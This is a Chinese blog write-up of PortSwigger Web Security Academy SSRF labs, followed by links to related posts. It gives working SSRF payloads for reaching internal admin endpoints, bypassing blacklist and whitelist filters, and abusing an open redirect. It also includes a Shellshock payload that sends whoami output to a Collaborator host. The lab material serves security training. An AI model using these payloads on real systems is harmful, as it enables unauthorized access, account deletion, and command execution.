PortsWigger-SSRF

最新推荐文章于 2024-05-31 14:31:06 发布
最新推荐文章于 2024-05-31 14:31:06 发布
阅读量889 收藏 22
点赞数 20
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74606212/article/details/136417951
版权

Lab: Basic SSRF against the local server

任务:

删除用户carlos 

在商品详情里可以看到:

 

 抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

 接下来我们根据提示

 

知道目标用户的url了

我们重复第一步

http://localhost/admin/delete?username=carlos

Lab: Basic SSRF against another back-end system

任务:

删除用户carlos

在商品详情里可以看到: 

 

 

url解码

http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1

根据提示我们开始爆破子网ip 

发现192.168.0.92

找到目标用户url地址

payload:

http://192.168.0.92:8080/admin/delete?username=carlos

完成

 

Lab: Blind SSRF with out-of-band detection

任务:

访问商品

抓包

发送至Repeater

启动Burp Collaborator客户端

点击"Copy to clipboard",并使Burp Collaborator客户端窗口保持打开状态。

更改Referer标头,将复制的Burp Collaborator域代替原始域 

然后我们返回到Burp Collaborator客户端窗口,然后单击“Poll now”。如果没有任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。

完成

Lab: SSRF with blacklist-based input filter

任务:

在商品详情里可以看到:

 

抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

接下来我们根据提示开始尝试

综上所述,127.0.0.1被禁用了,但是127.1可以绕过

接下来我们访问admin

发现admin也被禁用了

这里可以使用双url编码绕过

a的url编码是%61

所以双url编码为%2561

绕过成功 

 

获得目标用户url地址

payload:

http://127.1/%2561dmin/delete?username=carlos

 

完成

Lab: SSRF with filter bypass via open redirection vulnerability

任务:

在商品详情里可以找到:

抓包

url解码

%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
/product/stock/check?productId=1&storeId=1

 根据提示点击next product

发现path传参

接下来根据任务

 获得目标用户的url地址

payload:

/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

完成 

 Lab: Blind SSRF with Shellshock exploitation

任务:

这里需要安装拓展插件Collaborator Everywhere

接下来就是将实验室域添加到Burp Suite的目标范围,以便Collaborator Everywhere将其作为目标。

接下来当我们浏览网站时,就会扫描出存在ssrf的漏洞

分别是User-Agent和Referer

根据提示

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN

 

复制橙色内容 

 

 完成

Lab: SSRF with whitelist-based input filter 

任务:

在商品详情里可以发现:

抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

将stockApi参数中的URL更改为

http://127.0.0.1/

 

说明127.0.0.1被禁用了

接下来我们将URL更改为 

http://username@stock.weliketoshop.net/

然后在username后添加一个#

我们可以使用上面使用过的方法,将#双url编码%2523

将username改为localhost,并加上admin

 获得目标用户的url地址

payload:

http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

完成

 

orzw
关注
  • 20
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
Cyber-Security-Resources
05-23
网络安全资源 以下是我最喜欢使用的资源。 这将定期更新。 网络渗透测试: 在线资源 Hacker101: ://www.hacker101.com Bugcrowd大学: ://www.bugcrowd.com/hackers/bugcrowd-university/ 骇客文章: : Portswingers研究学院: ://portswigger.net/web-security Bugcrowd的Github: : Nahamsec的资源: : Nahamsec撰写的《小事》: ://docs.google.com/presentation/d/1xgvEScGZ_ukNY0rmfKz1JN0sn-CgZY_rTp2B_SZvijk/edit#slide=id.g4052c4692d_0_0 ZSeano的Barker: ://bugbountyhunte
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
CVE-2020-14368:Eclipse CHE的交互式RCE漏洞演示
05-15
CSWSH-THEIA-CVE-2020-14368 报告目标:可在che.openshift.io上获得Eclipse CHE部署 漏洞类型:跨站点Websocket劫持 发现日期:2020-04-08 作者:Robin Duda(codingchili @ github) 概括 Eclipse CHE adn Theia中的/ services websocket端点容易受到跨站点websocket劫持的攻击。 此漏洞影响使用cookie或基本身份验证的Eclipse CHE服务器,因为Websocket连接不会执行任何跨站点检查或通道内身份验证,从第三方域进行连接时,浏览器会自动包含所有凭据。 该攻击的工作原理与跨站点请求伪造攻击一样,不同之处在于它的功能强大得多,因为它可以使攻击者进行双向通信。 在此处阅读有关CSWSH的更多信息: ://portswigger.net/w
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
buby by Eric Monti, Timur Duehr http://tduehr.github.com/buby 注: 本文档适用于 Buby 的旧 gem 版本。 它不适用于 BurpSuite 的当前版本。 对于 Burp 1.5.01 及更高版本,请使用 Buby 的 BApp 版本。 此文档将在下一个版本中更新。 说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 该扩展旨在为 Burp Suite 添加 Ruby 脚本能力,其界面可与 Burp 的纯 Java 扩展界面相媲美。 这个扩展最适合 Burp S
burp靶场--ssrf
qq_33168924的博客
01-17 1252
服务器端请求伪造是一种 Web 安全漏洞,允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭据,或者代码执行。
PortSwigger靶场(三)SSRF服务端请求伪造
weixin_52835927的博客
10-19 257
简单的来说就是有时候我们对网站进行黑盒测试,由于在我们攻击后,网站的安全设置让我们看不到回显,也就有漏洞也不知到在哪里,此时我们使用oast,将受攻击影响的地方通过请求回应时经过另外一个服务器的信息表现出来,这样我们就知道我们的攻击造成了什么效果在这里我们只需要在referer头中换成collaborator中的url地址,然后发送过去,等待一段时间之后就可以在collaborator中发现dns和http类型的改动,这时试验结束,这个实验其实是想教大家基本的带外注入方法,以便在接下来的实验使用。
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 1305
Portwigge的Web安全漏洞训练平台SSRF通关
PortSwigger 服务端请求伪造 (SSRF)
weixin_42451330的博客
11-18 973
本文介绍PortSwigger靶场 服务端请求伪造 (SSRF),包括基本SSRF、另一个系统SSRF、黑名单SSRF、白名单SSRF,重定向SSRF、盲外带SSRF。如有疑问欢迎私聊。
SSRF漏洞解析
apple_52721339的博客
04-23 342
SSRF(Server-Side Request Forgery,服务端请求伪造)是指攻击者向服务端发送包含恶意 URL 链接的请求,借由服务端去访问此 URL ,以获取受保护网络内的资源的一种安全漏洞。SSRF 常被用于探测攻击者无法访问到的网络区域,比如服务器所在的内网,或是受防火墙访问限制的主机。 ​ SSRF 漏洞的产生,主要是因为在服务端的 Web 应用,需要从其他服务器拉取数据资源,比如图片、视频、文件的上传/下载、业务数据处理结果,但其请求地址可被外部用户控制。 ​ 请求地址被恶意利用的话,如
网络安全的神秘世界】docker搭建pikachu靶场
weixin_54750312的博客
05-31 410
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
网络安全行为可控定义以及表现内容简述
行云管家
05-28 403
在数字化快速发展的今天,网络安全已成为国家和企业不可或缺的防线。据统计,网络攻击事件频发,给全球经济带来了巨大损失。因此,确保网络安全行为可控显得尤为重要。今天我们来聊聊网络安全行为可控定义以及表现内容。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1111
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
网络安全||信息加解密技术以及密钥管理技术
2401_84434570的博客
05-31 708
IDEA:128位密钥、64位数据块、比DES的加密性好、对计算机功能要求相对低,PGP。对称加密(又称为私人密钥加密/共享密钥加密):加密与解密使用同一密钥。非对称加密(又称为公开密钥加密):密钥必须成对使用(公钥加密,相应的私钥解密)。:高级加密标准,又称Rijndael加密法,是美国政府采用的一种区块加密标准。,现在通用的证书一般采用UTC时间格式,它的计时范围为1950-2049;:替换+移位、56位密钥、64位数据块、速度快、密钥易产生。2048位(或1024位)密钥、计算量极大、难破解。
【Python安全攻防】【网络安全】一、常见被动信息搜集手段
weixin_43031313的博客
05-28 858
执行上述命令后,导入会报错(找不到Whois模块)(在PyCharm中,IDLE则未出现此问题),需要在报错处再次执行安装命令。《Python安全攻防——渗透测试实战指南》,MS08067安全实验室 编著,北京,机械工业出版社,2021年10月第1版。:用来查询域名是否已经被注册,以及注册域名的详细信息。参数host为目标的URL,返回对应的ip地址。:通过目标URL查询目标的IP地址。
网络安全Web安全学习-前言及先导
最新发布
goldfish8848的博客
05-31 1373
网络安全学习 - 前置梳理
四、通信和网络安全—局域网|广域网|远程连接和攻击技术(CISSP)
afei001
05-28 465
四、通信和网络安全—局域网|广域网|远程连接和攻击技术(CISSP)
网络安全防御之下一代防火墙部署思路分享
hanniuniu13的博客
05-28 494
F5提供的一整套完整的全栈安全解决方案,能够在所有部署站点进行威胁数据的收集和分析,包括由F5威胁情报(F5 Threat Campaigns)服务检测到的正在进行和新出现的攻击活动。同时部署方式也由传统的本地部署进化到了容器化管理,以及进一步的多云环境部署。借助F5分布式云WAAP解决方案的部署,所有途经F5的流量均会受到监控,并对相关的恶意用户行为采取主动的安全防御措施。这项新功能提供的误拦截抑制,将使阻止恶意流量变得更简单,且不会意外地阻止合法用户,并减少启用特定应用防护所需的时间,从而简化运维。
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值